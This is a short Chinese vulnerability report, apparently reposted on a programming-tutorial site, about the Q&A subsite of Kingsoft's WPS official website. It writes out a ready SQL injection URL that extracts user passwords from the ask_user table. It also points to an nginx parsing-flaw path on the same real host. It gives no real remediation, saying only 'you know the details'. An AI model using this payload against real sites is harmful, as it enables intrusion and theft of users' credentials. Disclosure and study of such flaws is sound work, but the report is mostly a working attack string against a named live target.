详细说明: http://zhidao.wps.cn/ 此站为金山WPS官网的一个问答系统,由tipask1.3搭建,存在SQL注射 漏洞 SQL: http://zhidao.wps.cn/?question/ajaxsearch/123%27union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19%20from%20ask_user%23%27% 还有nginx解析漏洞:<code>http://zhidao.wps.cn/robots.txt/1.php> 漏洞证明: 修复方案: 具体你懂的 作者: 数据流
查看更多关于金山WPS官网知道子站注射及解析漏洞 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13029